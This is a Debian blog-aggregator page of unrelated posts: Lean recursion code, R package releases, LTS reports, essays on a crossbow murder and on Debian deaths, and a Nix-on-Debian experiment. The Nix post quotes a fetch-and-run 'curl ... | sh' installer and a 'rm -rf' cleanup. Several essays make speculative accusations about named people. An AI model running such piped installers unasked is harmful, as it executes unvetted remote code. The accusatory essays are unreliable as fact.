Filing tax this year was really painful.
14 March, 2025 01:27AM by Junichi Uekawa
planet: Debian Social Contract point #3: we will not hide problems
Debian is a trademark of Software in the Public Interest, Inc. This site is operated independently in the spirit of point three of the Debian Social Contract which tells us We will not hide problems.
14 March, 2025 01:27AM by Junichi Uekawa
The horrific crossbow murders in Bushey occurred relatively close to where I used to reside in St Albans, Hertfordshire. While the suspect was on the run, I rang some friends who live in the area to ask if they had checked all their doors and windows were really locked.
It was risky to publish so much detail about the case while it is still in progress knowing that some new evidence might come along to contradict me. As it turns out, the blog was largely correct with its focus on the relevance of social control media and the toxic culture. At the very end of the trial, prosecutors revealed that Kyle Clifford had been following Andrew Tate, justifying my concerns about the role of social control media.
One key piece of evidence appears to be inconsistent: the date of the crossbow purchase. This is really fundamental to understanding what was going on in Clifford's mind. In some reports, they claim he called his brother in prison on 1 July 2024 to declare he had ordered a crossbow. In reports from the same media organizations, sometimes within the same page, they claim he made the purchases on 3 July, that is, the day that his ex-girlfriend shared a Tweet about women leaving their partners.
Examples of the contradiction:
Sometimes journalists do make mistakes with dates. Sometimes lawyers make mistakes with dates. Maybe he had started thinking about the order or started the online shopping cart on 1 July but only made the payment on 3 July. Maybe the conversation with his brother on 1 July was really boasting about something he hadn't actually ordered yet.
The British police themselves have attracted a lot of controversy for their infiltration of environment activist groups and the relationships between undercover police and female activists. Yet when they had this recording of a convicted murderer talking to his brother about the purchase of weapons, they may have had a missed intelligence opportunity.
The news summaries of this horrendous crime only give us the broad brushstrokes. It is very easy to hate this guy. Even the killer's lawyer stood up before the judge and said he was only defending the guy because it was his job to do so but he also thinks it is a particularly despicable crime.
To really deal with the Andrew Tate phenomenon, we need to break it into three phases, which can be easily confirmed using the live feeds from the trial and the "timeline" news articles:
Date(s) | Who | What |
---|---|---|
23 June | Louise | Begins to communicate the relationship is over |
23 June to 2 July | Kyle | Begins plotting, although his only concrete action is to purchase rope and arrange it as a noose for himself in the cemetary. |
3 July | Louise | Shares / re-tweets comment about women leaving their partner, gives the break-up a public dimension |
3 July, 4 July | Kyle | Buys offensive weapons, crossbow, knife, air gun, petrol cans |
9 July | Kyle | Triple murder with crossbow and knife |
To understand Clifford's feelings when his ex starts to engage in publicity on social control media, we can take a detour and look at the case of one of the four police officers who committed suicide after the January 6 riot at the US Capitol.
Of particular interest is the case of Officer Kyle DeFreytag. DeFreytag was only deployed to the US Capitol after the rioters had been chased away. He was posted there to enforce the curfew in the empty building where five people had been killed earlier in the day. Despite the fact the riot was over, the officers posted there that night must have felt like they were in a haunted house. Moreover, they may have feared a return of the rioters. After all, the rioters had been egged on by the president himself, Donald Trump, who still had another two weeks in office. Trump had used social media and a speech in ways that appeared to encourage civil disorder. Many officers who served in the days after the riot reported feeling a sense of dread and despair, an ongoing trauma. A few months later, DeFreytag became the fourth January 6 suicide victim.
Whether it is the January 6 mob or the vigilantism when a woman starts a rumor on social control media, the sense of apprehension is much the same. I spoke to another man in a high profile position who was subject to vendettas by a woman. Somebody in a more senior position made the mistake of sharing it too quickly. The victim told me that his first response was to get his wife and children out of the house. The mob mentality that grips people in social control media is very similar to the way people behave out of character when they assemble in a large group at a protest or a football match.
When Elon Musk's Twitter/X platform enticed Louise Hunt to make their break-up into a public story, she may not have intended any harm at all. Clifford, on the other hand, may have feared the worst, including the possibility that her celebrity father may share tweets with his 10,000 followers. Clifford's perception of the potential for a mob may have been based on the worst case scenario, nonetheless, he is not the only man who was taken by this sense of dread. If he saw the break-up becoming a public drama it doesn't justify the extreme violence but it may help us understand the step change in his behavior.
When Clifford's brother was convicted for murder, it brought about an online wave of public hostility against his family. Most of us never experience something like that. Yet for Clifford, when he saw his ex starting to create a negative narrative on Twitter, his previous experience of social media shamings would have compounded his sense of dread about how Twitter might exploit his current break-up.
Social control media clearly seeks to profit from the public fascination with conflict involving young white women. Sadly, a good profile photo and an emotional story goes a lot further than fact-checked evidence. When journalists hacked the mobile phone of 2002 murder victim Milly Dowler, looking for her last voicemail messages, there was public outrage. The rise of social control media has allowed Elon Musk to profit from tapping into the last thoughts of crossbow victim Louise Hunt. The erosion of this couple's privacy may have been a factor in Clifford's turn for the worse.
The fear of vigilantism doesn't justify Clifford's actions but it does suggest why on 3 July there was a step change in his planning on the day the tweet was shared. Before the tweeting, he appeared to be more concerned with ending his own life but after the tweet, his actions were far worse.
The suicide rate for men is four times higher than for women. Shortly before the crossbow murders, somebody submitted this Freedom of Information request asking how many people had taken their own life on the London Underground. The authorities were unable to reply, partly because the transport department is not responsible for classifying the cause of death, that is the job of the coroner. A report on Wikipedia suggests 643 suicide attempts in the period 2000 to 2010, roughly one per week. It is not clear how many of these relate to relationship breakdown.
People widely commented on the fact that Clifford, who is in prison, could refuse to come to the court for the trial and sentencing. Even the Prime Minister's office in Downing Street made public comment on this feature of the trial. Nonetheless, neither Andrew Tate nor Elon Musk attended the trial either. The content they respectively create and propogate is clearly harmful to people at vulnerable times in their lives.
Look at how Jack Dorsey was confirmed to speak at FOSDEM this year but he changed his mind and canceled at the last minute.
In the victim statement of John Hunt, he stated:
When I challenge myself about how you were able to deceive us all, I simply say that you are a psychopath who, for the duration of your time together with Louise, was able to disguise yourself as an ordinary human being.
We could say similar things for social control media platforms pretending to be like a trusted friend while they are really exploiting people's trust to violate our privacy.
Daily Mail tells us that Kyle purchased the crossbow on the same day Louise re-tweeted.
The Sun tells us about the conversation about "buying" the crossbow on 1 July and also on 3 July.
Sky News send live updates during the trial. They appear to be paraphrasing a speech by the prosecutor. Once again, it is not clear whether Kyle Clifford really made the actual purchase on 1 July or 3 July.
Louise Hunt's "last tweet" was actually re-tweeting somebody else. Did Kyle Clifford see this and did he only go through with the purchasing of weapons after this impacted him?
I don't want to suggest Louise Hunt intended to start a mob, she is a victim of social media just as much as anybody else. Social media mobs have a mind of their own.
When social control media vigilantism started to spread rumors about Dr Jacob Appelbaum in 2015, it quickly turned into real-world aggression, as evidenced by the graffiti on Dr Appelbaum's home (below). I checked the debian-private gossip messages and proved that the rumors were falsified for what appears to be a sadistic political motive.
How many men fear similar reprisals when somebody makes their life into a subject for public speculation?
After the Irish elections, I canceled the auto-renewal for various domain names that look similar to rival candidates. This means that the registrations will lapse at the end of 12 months, in November 2025 and anybody else can then register the same names.
There are five years between general elections in Ireland and these domain names won't be very useful for me in that period.
Why wait for the domain names to lapse in November? I decided to stagger the transfer of the domain names by releasing the passwords publicly. I'm saving the best for last.
Here is the domain transfer password for NickDelehanty.ie:
To take NickDelehanty.ie from me, you can use any domain name registrar who you prefer. It is currently hosted with Gandi. The Irish .IE registry has a full list of registrars that you can choose from.
There is a good chance that other people may have more creative ideas for using some of the domain names. There are many people with the same name as some of the candidates. I don't want to stand in their way.
At the count center, I reached out to some of the other candidates and let them know I'd be happy to gift the domain names for Christmas. Some of them never got back to me.
In a couple of cases, the candidates had previously owned the domain names and failed to renew them. This creates a much higher risk that somebody could acquire their former domain name and deliberately impersonate them. I'll hold back on releasing those domain names for a little bit longer.
The domain names were acquired in good faith but simply letting the former domain name of the justice minister lapse into the hands of a cybersquatter could create a risk for innocent members of the public. Look at how much money the FSFE people have taken by impersonating the FSF. Politics aside, I'd prefer to just give Jim the domain name so that doesn't happen.
Then again, it raises some ethical questions: if I give a domain name to a member of the cabinet, is it a gift? If he owned it before too, and I've helped him get it back with no real benefit to myself, is it still a gift? If it is a gift and if the transfer of the domain is public knowledge, does that neutralize any ethical concerns and comply with disclosure rules?
I hope my acquisition of the domains will encourage some productive ethical discussions about the role of technology in our democracy. While people are distracted by that, cybersquatters are busy buying up domain names that look like future candidates to replace Pope Francis. It's not polite to say that while people are praying for the Pope's recovery from illness but nonetheless, that is the behavior of real cybersquatters.
Each .IE domain name costs about EUR 20 to register. I haven't even asked anybody to reimbourse me for that expense. Every candidate who's vote tally exceeds a quarter of a quota is able to fully recover their expenses, including domain name fees, from public funds.
After somebody takes NickDelehanty.IE off my hands I'll wait a few days and then share the next domain in the list. Please follow my RSS feed to be first to know when the next opportunity appears.
Daniel Pocock is a Debian Developer.
Please see the chronological history of how the Debian harassment and abuse culture evolved.
A few months ago I explained that one reason why this blog has become more quiet is that all my work on Lean is covered elsewhere.
This post is an exception, because it is an observation that is (arguably) interesting, but does not lead anywhere, so where else to put it than my own blog…
Want to share your thoughts about this? Please join the discussion on the Lean community zulip!
When defining a function recursively in Lean that has nested recursion, e.g. a recusive call that is in the argument to a higher-order function like List.map
, then extra attention used to be necessary so that Lean can see that xs.map
applies its argument only elements of the list xs
. The usual idiom is to write xs.attach.map
instead, where List.attach
attaches to the list elements a proof that they are in that list. You can read more about this my Lean blog post on recursive definitions and our new shiny reference manual, look for Example “Nested Recursion in Higher-order Functions”.
To make this step less tedious I taught Lean to automatically rewrite xs.map
to xs.attach.map
(where suitable) within the construction of well-founded recursion, so that nested recursion just works (issue #5471). We already do such a rewriting to change if c then … else …
to the dependent if h : c then … else …
, but the attach-introduction is much more ambitious (the rewrites are not definitionally equal, there are higher-order arguments etc.) Rewriting the terms in a way that we can still prove the connection later when creating the equational lemmas is hairy at best. Also, we want the whole machinery to be extensible by the user, setting up their own higher order functions to add more facts to the context of the termination proof.
I implemented it like this (PR #6744) and it ships with 4.18.0, but in the course of this work I thought about a quite different and maybe better™ way to do this, and well-founded recursion in general:
fix
Recall that to use WellFounded.fix
WellFounded.fix : (hwf : WellFounded r) (F : (x : α) → ((y : α) → r y x → C y) → C x) (x : α) : C x
we have to rewrite the functorial of the recursive function, which naturally has type
F : ((y : α) → C y) → ((x : α) → C x)
to the one above, where all recursive calls take the termination proof r y x
. This is a fairly hairy operation, mangling the type of matcher’s motives and whatnot.
Things are simpler for recursive definitions using the new partial_fixpoint
machinery, where we use Lean.Order.fix
Lean.Order.fix : [CCPO α] (F : β → β) (hmono : monotone F) : β
so the functorial’s type is unmodified (here β
will be ((x : α) → C x)
), and everything else is in the propositional side-condition montone F
. For this predicate we have a syntax-guided compositional tactic, and it’s easily extensible, e.g. by
theorem monotone_mapM (f : γ → α → m β) (xs : List α) (hmono : monotone f) :
monotone (fun x => xs.mapM (f x))
Once given, we don’t care about the content of that proof. In particular proving the unfolding theorem only deals with the unmodified F
that closely matches the function definition as written by the user. Much simpler!
Isabelle also supports well-founded recursion, and has great support for nested recursion. And it’s much simpler!
There, all you have to do to make nested recursion work is to define a congruence lemma of the form, for List.map
something like our List.map_congr_left
List.map_congr_left : (h : ∀ a ∈ l, f a = g a) :
List.map f l = List.map g l
This is because in Isabelle, too, the termination proofs is a side-condition that essentially states “the functorial F
calls its argument f
only on smaller arguments”.
I had wished we could do the same in Lean for a while, but that form of congruence lemma just isn’t strong enough for us.
But maybe there is a way to do it, using an existential to give a witness that F
can alternatively implemented using the more restrictive argument. The following callsOn P F
predicate can express that F
calls its higher-order argument only on arguments that satisfy the predicate P
:
section setup
variable {α : Sort u}
variable {β : α → Sort v}
variable {γ : Sort w}
def callsOn (P : α → Prop) (F : (∀ y, β y) → γ) :=
∃ (F': (∀ y, P y → β y) → γ), ∀ f, F' (fun y _ => f y) = F f
variable (R : α → α → Prop)
variable (F : (∀ y, β y) → (∀ x, β x))
local infix:50 " ≺ " => R
def recursesVia : Prop := ∀ x, callsOn (· ≺ x) (fun f => F f x)
noncomputable def fix (wf : WellFounded R) (h : recursesVia R F) : (∀ x, β x) :=
wf.fix (fun x => (h x).choose)
def fix_eq (wf : WellFounded R) h x :
fix R F wf h x = F (fix R F wf h) x := by
unfold fix
rw [wf.fix_eq]
apply (h x).choose_spec
This allows nice compositional lemmas to discharge callsOn
predicates:
theorem callsOn_base (y : α) (hy : P y) :
callsOn P (fun (f : ∀ x, β x) => f y) := by
exists fun f => f y hy
intros; rfl
@[simp]
theorem callsOn_const (x : γ) :
callsOn P (fun (_ : ∀ x, β x) => x) :=
⟨fun _ => x, fun _ => rfl⟩
theorem callsOn_app
{γ₁ : Sort uu} {γ₂ : Sort ww}
(F₁ : (∀ y, β y) → γ₂ → γ₁) -- can this also support dependent types?
(F₂ : (∀ y, β y) → γ₂)
(h₁ : callsOn P F₁)
(h₂ : callsOn P F₂) :
callsOn P (fun f => F₁ f (F₂ f)) := by
obtain ⟨F₁', h₁⟩ := h₁
obtain ⟨F₂', h₂⟩ := h₂
exists (fun f => F₁' f (F₂' f))
intros; simp_all
theorem callsOn_lam
{γ₁ : Sort uu}
(F : γ₁ → (∀ y, β y) → γ) -- can this also support dependent types?
(h : ∀ x, callsOn P (F x)) :
callsOn P (fun f x => F x f) := by
exists (fun f x => (h x).choose f)
intro f
ext x
apply (h x).choose_spec
theorem callsOn_app2
{γ₁ : Sort uu} {γ₂ : Sort ww}
(g : γ₁ → γ₂ → γ)
(F₁ : (∀ y, β y) → γ₁) -- can this also support dependent types?
(F₂ : (∀ y, β y) → γ₂)
(h₁ : callsOn P F₁)
(h₂ : callsOn P F₂) :
callsOn P (fun f => g (F₁ f) (F₂ f)) := by
apply_rules [callsOn_app, callsOn_const]
With this setup, we can have the following, possibly user-defined, lemma expressing that List.map
calls its arguments only on elements of the list:
theorem callsOn_map (δ : Type uu) (γ : Type ww)
(P : α → Prop) (F : (∀ y, β y) → δ → γ) (xs : List δ)
(h : ∀ x, x ∈ xs → callsOn P (fun f => F f x)) :
callsOn P (fun f => xs.map (fun x => F f x)) := by
suffices callsOn P (fun f => xs.attach.map (fun ⟨x, h⟩ => F f x)) by
simpa
apply callsOn_app
· apply callsOn_app
· apply callsOn_const
· apply callsOn_lam
intro ⟨x', hx'⟩
dsimp
exact (h x' hx')
· apply callsOn_const
end setup
So here is the (manual) construction of a nested map
for trees:
section examples
structure Tree (α : Type u) where
val : α
cs : List (Tree α)
-- essentially
-- def Tree.map (f : α → β) : Tree α → Tree β :=
-- fun t => ⟨f t.val, t.cs.map Tree.map⟩)
noncomputable def Tree.map (f : α → β) : Tree α → Tree β :=
fix (sizeOf · < sizeOf ·) (fun map t => ⟨f t.val, t.cs.map map⟩)
(InvImage.wf (sizeOf ·) WellFoundedRelation.wf) <| by
intro ⟨v, cs⟩
dsimp only
apply callsOn_app2
· apply callsOn_const
· apply callsOn_map
intro t' ht'
apply callsOn_base
-- ht' : t' ∈ cs -- !
-- ⊢ sizeOf t' < sizeOf { val := v, cs := cs }
decreasing_trivial
end examples
This makes me happy!
All details of the construction are now contained in a proof that can proceed by a syntax-driven tactic and that’s easily and (likely robustly) extensible by the user. It also means that we can share a lot of code paths (e.g. everything related to equational theorems) between well-founded recursion and partial_fixpoint
.
I wonder if this construction is really as powerful as our current one, or if there are certain (likely dependently typed) functions where this doesn’t fit, but the β
above is dependent, so it looks good.
With this construction, functions defined by well-founded recursion will reduce even worse in the kernel, I assume. This may be a good thing.
What unfortunately kills this idea, though, is the generation of the functional induction principles, which I believe is not (easily) possible with this construction: The functional induction principle is proved by massaging F
to return a proof, but since the extra assumptions (e.g. for ite
or List.map
) only exist in the termination proof, they are not available in F
.
Oh wey, how anticlimactic.
Curiously, if we didn’t have functional induction at this point yet, then very likely I’d change Lean to use this construction, and then we’d either not get functional induction, or it would be implemented very differently, maybe a more syntactic approach that would re-prove termination. I guess that’s called path dependence.
10 March, 2025 05:47PM by Joachim Breitner (mail@joachim-breitner.de)
This was my hundred-twenty-eighth month that I did some work for the Debian LTS initiative, started by Raphael Hertzog at Freexian. During my allocated time I uploaded or worked on:
Last but not least I did some days of FD this month and attended the monthly LTS/ELTS meeting.
This month was the seventy-ninth ELTS month. During my allocated time I uploaded or worked on:
Last but not least I did some days of FD this month and attended the monthly LTS/ELTS meeting.
This month I uploaded new packages or new upstream or bugfix versions of:
This work is generously funded by Freexian!
This month I uploaded new packages or new upstream or bugfix versions of:
Finally matomo was uploaded. Thanks a lot to Utkarsh Gupta and William Desportes for doing most of the work to make this happen.
This work is generously funded by Freexian!
Unfortunately I didn’t found any time to upload packages.
Have you ever heard of poliastro? It was a package to do calculations related to astrodynamics and orbital mechanics? It was archived by upstream end of 2023. I am now trying to revive it under the new name boinor and hope to get it back into Debian over the next months.
This is almost the last month that Patrick, our Outreachy intern for the Debian Astro project, is handling his tasks. He is working on automatic updates of the indi 3rd-party driver.
Unfortunately I didn’t found any time to work on this topic.
This month I uploaded new packages or new upstream or bugfix versions of:
Unfortunately I didn’t found any time to work on this topic.
This month I accepted 437 and rejected 64 packages. The overall number of packages that got accepted was 445.
10 March, 2025 03:33PM by alteholz
An update to our package RcppNLoptExample arrived on CRAN earlier today marking the first update since the intial release more than four year ago. The nloptr package, created by Jelmer Ypma, has long been providing an excellent R interface to NLopt, a very comprehensive library for nonlinear optimization. In particular, Jelmer carefully exposed the API entry points such that other R packages can rely on NLopt without having to explicitly link to it (as one can rely on R providing sufficient function calling and registration to make this possible by referring back to nloptr which naturally has the linking information and resolution). This package demonstrates this in a simple-to-use Rcpp example package that can serve as a stanza.
More recent NLopt versions appear to have changed behaviour a little so that an example we relied upon in simple unit test now converges to a marginally different numerical value, so we adjusted a convergence treshold. Other than that we did a number of the usual small updates to package metadata, to the README.md file, and to continuous integration.
The (very short) NEWS entry follows:
Changes in version 0.0.2 (2025-03-09)
Updated tolerance in simple test as newer upstream nlopt change behaviour ever so slightly leading to an other spurious failure
Numerous small and standard updates to DESCRIPTION, README.md, badges, and continuous integration setup
Courtesy of my CRANberries, there is also a diffstat report for this release. For questions, suggestions, or issues please use the issue tracker at the GitHub repo.
This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. If you like this or other open-source work I do, you can now sponsor me at GitHub.
Adrian von Bidder-Senn è morto il 17 aprile 2011. La data è confermata in numerosi posti. Ho già sottolineato in precedenza che questa morte, che potrebbe essere parte del Debian Suicide Cluster, è avvenuta lo stesso giorno del nostro matrimonio . Che regalo incredibile da parte della " famiglia " Debian.
Un altro fatto fondamentale è che era la domenica delle Palme, la domenica prima di Pasqua. La domenica delle Palme, la Bibbia ci racconta la storia di Gesù Cristo che arriva a Gerusalemme :
Gesù pianse (Giovanni 11:35). Sì, Gesù sapeva che avrebbe resuscitato Lazzaro dai morti, ma questo non gli impedì di provare il dolore della sua morte qui e ora. E gli spettatori riconoscono il significato di questo. Così i Giudei dissero: "Guarda come lo amava!" (Giovanni 11:36)
L'implicazione è che Gesù sapeva che sarebbe morto. Perché non si è semplicemente voltato e non è tornato indietro?
Ma Dio dimostra il suo amore verso di noi in questo: che, mentre eravamo ancora peccatori, Cristo morì per noi. (Romani 5:8)
La vedova di Adrian è Diana von Bidder-Senn che ora ha un ruolo nell'Evangelical People's Party of Switzerland (EVP). In tedesco, il termine Evangelical è equivalente al termine Protestant in inglese. È essenzialmente un partito cristiano-democratico.
Basilea, dove vivevano, è considerata un cantone/città protestante, anche se in pratica il ruolo della religione sta gradualmente diminuendo in Svizzera. Il numero di cattolici a Basilea è quasi alla pari con il numero di protestanti.
Negli ultimi anni, i debianisti canaglia hanno insultato la mia famiglia con ogni genere di voci. Casualmente, il cugino che era nel coro del cardinale Pell era testimone di nozze al nostro matrimonio, ancora una volta, lo stesso giorno in cui morì Adrian von Bidder-Senn, la domenica delle Palme. Dov'ero il giorno in cui morì il cardinale? In Italia . Fu per colpa dei debianisti canaglia, del cardinale o un po' di entrambi?
Si prega di consultare la cronologia di come si è evoluta la cultura delle molestie e degli abusi in Debian .
Adrian von Bidder-Senn est décédé le 17 avril 2011. La date est confirmée à de nombreux endroits. J'ai déjà signalé que ce décès, qui fait peut-être partie du groupe de suicides de Debian, a eu lieu le même jour que notre mariage . Quel cadeau incroyable de la part de la « famille » Debian.
Un autre fait important est que c'était le dimanche des Rameaux, le dimanche avant Pâques. Le dimanche des Rameaux, la Bible nous raconte l'histoire de l'arrivée de Jésus-Christ à Jérusalem :
Jésus pleura (Jean 11:35). Oui, Jésus savait qu’il allait ressusciter Lazare d’entre les morts, mais cela ne l’a pas empêché de vivre la douleur de sa mort ici et maintenant. Et les spectateurs en ont reconnu l’importance. Alors les Juifs dirent : « Voyez comme il l’aimait ! » (Jean 11:36)
Cela implique que Jésus savait qu'il allait mourir. Pourquoi n'a-t-il pas simplement fait demi-tour et n'est-il pas reparti ?
Mais Dieu prouve son amour envers nous, en ceci : lorsque nous étions encore des pécheurs, Christ est mort pour nous. (Romains 5:8)
La veuve d'Adrian est Diana von Bidder-Senn, qui occupe aujourd'hui un poste au sein du Parti évangélique populaire de Suisse (PEV). En allemand, le terme évangélique est équivalent au terme protestant en anglais. Il s'agit essentiellement d'un parti démocrate-chrétien.
Bâle, où ils vivaient, est considérée comme un canton/une ville protestante, même si dans la pratique le rôle de la religion décline progressivement en Suisse. Le nombre de catholiques à Bâle est presque égal à celui des protestants.
Ces dernières années, les Debianistes rebelles ont insulté ma famille avec toutes sortes de rumeurs. Par coïncidence, le cousin qui faisait partie du chœur du cardinal Pell était l'un des garçons d'honneur à notre mariage, une fois de plus, le jour même où Adrian von Bidder-Senn est décédé, le dimanche des Rameaux. Où étais-je le jour du décès du cardinal ? En Italie . Était-ce à cause des Debianistes rebelles, du cardinal ou un peu des deux ?
Veuillez consulter l' historique chronologique de l'évolution de la culture du harcèlement et des abus dans Debian .
Adrian von Bidder-Senn murió el 17 de abril de 2011. La fecha está confirmada en numerosos lugares. Ya he señalado anteriormente que esta muerte, que puede ser parte del grupo de suicidios de Debian, se produjo el mismo día de nuestra boda . Qué regalo tan maravilloso de la " familia " Debian.
Otro dato clave es que era Domingo de Ramos, el domingo anterior a la Pascua. El Domingo de Ramos, la Biblia nos relata la llegada de Jesucristo a Jerusalén :
Jesús lloró (Juan 11:35). Sí, Jesús sabía que iba a resucitar a Lázaro de entre los muertos, pero eso no le impidió experimentar el dolor de su muerte aquí y ahora. Y los espectadores reconocieron el significado de esto. Entonces los judíos dijeron: “¡Mirad cómo lo amaba!” (Juan 11:36)
Lo que se deduce es que Jesús sabía que iba a morir. ¿Por qué no se dio la vuelta y regresó?
Pero Dios demuestra su amor para con nosotros en esto: en que siendo aún pecadores, Cristo murió por nosotros. (Romanos 5:8)
La viuda de Adrian es Diana von Bidder-Senn, que actualmente desempeña un cargo en el Partido Popular Evangélico de Suiza (EVP). En alemán, el término evangélico equivale al término protestante en inglés. Se trata, en esencia, de un partido demócrata cristiano.
Basilea, donde vivían, se considera un cantón/ciudad protestante, aunque en la práctica el papel de la religión está decayendo paulatinamente en Suiza. El número de católicos en Basilea es casi igual al de protestantes.
Los debianistas rebeldes han insultado a mi familia con todo tipo de rumores durante los últimos años. Casualmente, el primo que estaba en el coro del Cardenal Pell fue uno de los padrinos de boda de nuestra boda, una vez más, el mismo día en que murió Adrian von Bidder-Senn, el Domingo de Ramos. ¿Dónde estaba yo el día en que murió el Cardenal? En Italia . ¿Fue por culpa de los debianistas rebeldes, del Cardenal o un poco de ambos?
Consulte la historia cronológica de cómo evolucionó la cultura de acoso y abuso en Debian .
A new (mostly maintenance) release 0.2.3 of RcppTOML is now on CRAN.
TOMLis a file format that is most suitable for configurations, as it is meant to be edited by humans but read by computers. It emphasizes strong readability for humans while at the same time supporting strong typing as well as immediate and clear error reports. On small typos you get parse errors, rather than silently corrupted garbage. Much preferable to any and all of XML, JSON or YAML – though sadly these may be too ubiquitous now. TOML is frequently being used with the projects such as the Hugo static blog compiler, or the Cargo system of Crates (aka “packages”) for the Rust language.
This release was tickled by another CRAN request: just like yesterday’s and the RcppDate release two days ago, it responds to the esoteric ‘whitespace in literal operator’ depreceation warning. We alerted upstream too.
The short summary of changes follows.
Changes in version 0.2.3 (2025-03-08)
Correct the minimum version of Rcpp to 1.0.8 (Walter Somerville)
The package now uses Authors@R as mandated by CRAN
Updated 'whitespace in literal' issue upsetting clang++-20
Continuous integration updates including simpler r-ci setup
Courtesy of my CRANberries, there is also a diffstat report for this release. For questions, suggestions, or issues please use the issue tracker at the GitHub repo.
This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. If you like this or other open-source work I do, you can now sponsor me at GitHub.
A new release 0.1.13 of the RcppSimdJson package is now on CRAN.
RcppSimdJson wraps the fantastic and genuinely impressive simdjson library by Daniel Lemire and collaborators. Via very clever algorithmic engineering to obtain largely branch-free code, coupled with modern C++ and newer compiler instructions, it results in parsing gigabytes of JSON parsed per second which is quite mindboggling. The best-case performance is ‘faster than CPU speed’ as use of parallel SIMD instructions and careful branch avoidance can lead to less than one cpu cycle per byte parsed; see the video of the talk by Daniel Lemire at QCon.
This release was tickled by another CRAN request: just like
yesterday’s RcppDate
release, it responds to the esoteric ‘whitespace in literal
operator’ depreceation warning. Turns out that upstream simdjson had this fixed
a few months ago as the node bindings package ran into it. Other changes
include a bit of earlier polish by Daniel, another CRAN mandated update,
CI improvements, and a move of two demos to examples/
to
avoid having to add half a dozen packages to Suggests: for no real usage
gain in the package.
The short NEWS entry for this release follows.
Changes in version 0.1.13 (2025-03-07)
A call to
std::string::erase
is now guarded (Daniel)The package now uses Authors@R as mandated by CRAN (Dirk)
simdjson was upgraded to version 3.12.2 (Dirk)
Continuous integration updated to more compilers and simpler setup
Two demos are now in
inst/examples
to not inflate Suggests
Courtesy of my CRANberries, there is also a diffstat report for this release. For questions, suggestions, or issues please use the issue tracker at the GitHub repo.
This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. If you like this or other open-source work I do, you can now sponsor me at GitHub.
This month I didn't have any particular focus. I just worked on issues in my info bubble.
The SWH work was sponsored. All other work was done on a volunteer basis.
In case you haven't noticed, I'm trying to post and one of the things that entails is to just dump over the fence a bunch of draft notes. In this specific case, I had a set of rough notes about NixOS and particularly Nix, the package manager.
In this case, you can see the very birth of an article, what it looks like before it becomes the questionable prose it is now, by looking at the Git history of this file, particularly its birth. I have a couple of those left, and it would be pretty easy to publish them as is, but I feel I'd be doing others (and myself! I write for my own documentation too after all) a disservice by not going the extra mile on those.
So here's the long version of my experiment with Nix.
A couple friends are real fans of Nix. Just like I work with Puppet a lot, they deploy and maintain servers (if not fleets of servers) with NixOS and its declarative package management system. Essentially, they use it as a configuration management system, which is pretty awesome.
That, however, is a bit too high of a bar for me. I rarely try new operating systems these days: I'm a Debian developer and it takes most of my time to keep that functional. I'm not going to go around messing with other systems as I know that would inevitably get me dragged down into contributing into yet another free software project. I'm mature now and know where to draw the line. Right?
So I'm just testing Nix, the package manager, on Debian, because I learned from my friend that nixpkgs is the largest package repository out there, a mind-boggling 100,000 at the time of writing (with 88% of packages up to date), compared to around 40,000 in Debian (or 72,000 if you count binary packages, with 72% up to date). I naively thought Debian was the largest, perhaps competing with Arch, and I was wrong: Arch is larger than Debian too.
What brought me there is I wanted to run Harper, a fast spell-checker written in Rust. The logic behind using Nix instead of just downloading the source and running it myself is that I delegate the work of supply-chain integrity checking to a distributor, a bit like you trust Debian developers like myself to package things in a sane way. I know this widens the attack surface to a third party of course, but the rationale is that I shift cryptographic verification to another stack than just "TLS + GitHub" (although that is somewhat still involved) that's linked with my current chain (Debian packages).
I have since then stopped using Harper for various reasons and also wrapped up my Nix experiment, but felt it worthwhile to jot down some observations on the project.
Overall, Nix is hard to get into, with a complicated learning curve. I have found the documentation to be a bit confusing, since there are many ways to do certain things. I particularly tripped on "flakes" and, frankly, incomprehensible error reporting.
It didn't help that I tried to run nixpkgs on Debian which is technically possible, but you can tell that I'm not supposed to be doing this. My friend who reviewed this article expressed surprised at how easy this was, but then he only saw the finished result, not me tearing my hair out to make this actually work.
So here's how I got started. First I installed the nix binary package:
apt install nix-bin
Then I had to add myself to the right group and logout/log back in to get the rights to deploy Nix packages:
adduser anarcat nix-users
That wasn't easy to find, but is mentioned in the README.Debian file shipped with the Debian package.
Then, I didn't write this down, but the README.Debian
file above
mentions it, so I think I added a "channel" like this:
nix-channel --add https://nixos.org/channels/nixpkgs-unstable nixpkgs
nix-channel --update
And I likely installed the Harper package with:
nix-env --install harper
At this point, harper
was installed in a ... profile? Not sure.
I had to add ~/.nix-profile/bin
(a symlink to
/nix/store/sympqw0zyybxqzz6fzhv03lyivqqrq92-harper-0.10.0/bin
) to my
$PATH
environment for this to actually work.
Those last two commands (nix-channel
and nix-env
) were hard to
figure out, which is kind of amazing because you'd think a tutorial on
Nix would feature something like this prominently. But three
different tutorials failed to bring me up to that basic
setup, even the README.Debian
didn't spell that out clearly.
The tutorials all show me how to develop packages for Nix, not plainly how to install Nix software. This is presumably because "I'm doing it wrong": you shouldn't just "install a package", you should setup an environment declaratively and tell it what you want to do.
But here's the thing: I didn't want to "do the right thing". I just wanted to install Harper, and documentation failed to bring me to that basic "hello world" stage. Here's what one of the tutorials suggests as a first step, for example:
curl -L https://nixos.org/nix/install | sh
nix-shell --packages cowsay lolcat
nix-collect-garbage
... which, when you follow through, leaves you with almost precisely nothing left installed (apart from Nix itself, setup with a nasty "curl pipe bash". So while that works in testing Nix, you're not much better off than when you started.
Now that I have stopped using Harper, I don't need Nix anymore, which I'm sure my Nix friends will be sad to read about. Don't worry, I have notes now, and can try again!
But still, I wanted to clear things out, so I did this, as root:
deluser anarcat nix-users
apt purge nix-bin
rm -rf /nix ~/.nix*
I think this cleared things out, but I'm not actually sure.
This blurb wouldn't be complete without a mention that the Nix community has been somewhat tainted by the behavior of its founder. I won't bother you too much with this; LWN covered it well in 2024, and made a followup article about spinoffs and forks that's worth reading as well.
I did want to say that everyone I have been in contact with in the Nix community was absolutely fantastic. So I am really sad that the behavior of a single individual can pollute a community in such a way.
As a leader, if you have all but one responsability, it's to behave properly for people around you. It's actually really, really hard to do that, because yes, it means you need to act differently than others and no, you just don't get to be upset at others like you would normally do with friends, because you're in a position of authority.
It's a lesson I'm still learning myself, to be fair. But at least I don't work with arms manufacturers or, if I would, I would be sure as hell to accept the nick (or nix?) on the chin when people would get upset, and try to make amends.
So long live the Nix people! I hope the community recovers from that dark moment, so far it seems like it will.
And thanks for helping me test Harper!
